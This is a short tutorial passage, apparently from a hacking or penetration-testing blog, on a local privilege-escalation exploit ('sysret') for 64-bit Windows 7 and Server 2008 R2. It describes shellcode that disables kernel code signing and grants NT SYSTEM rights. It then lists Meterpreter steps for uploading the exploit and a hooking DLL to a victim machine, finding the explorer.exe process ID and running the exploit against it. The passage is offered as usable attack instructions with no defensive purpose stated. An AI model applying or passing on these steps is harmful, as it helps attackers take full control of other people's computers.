The shellcode disables kernel Code Signing and will grant NT SYSTEM privilege to specified Application or already running process (PID). Exploit successfully tested on Windows 7 SP0/1 (x64) and Windows 2008 R2 SP1 (x64).
![]()
![]()
![]()
![]()
Once you got the meterpreter session use ‘upload ‘command to upload the sysret.exeand MinHook.x64 in victim pc using
Upload /root/desktop/sysret/x64/Release/sysret.exe .
Upload /root/desktop/sysret/x64/Release/MinHook.x64.dll .
Now session use ‘ps‘command to displays a list of running processes on the target and find the PID number of Explorer.exe
The next step is we need to attach Meterpreter to the explorer.exe process. Victim explorer.exe process ID is 1588. Now type sysret.exe =pid (PID Number)
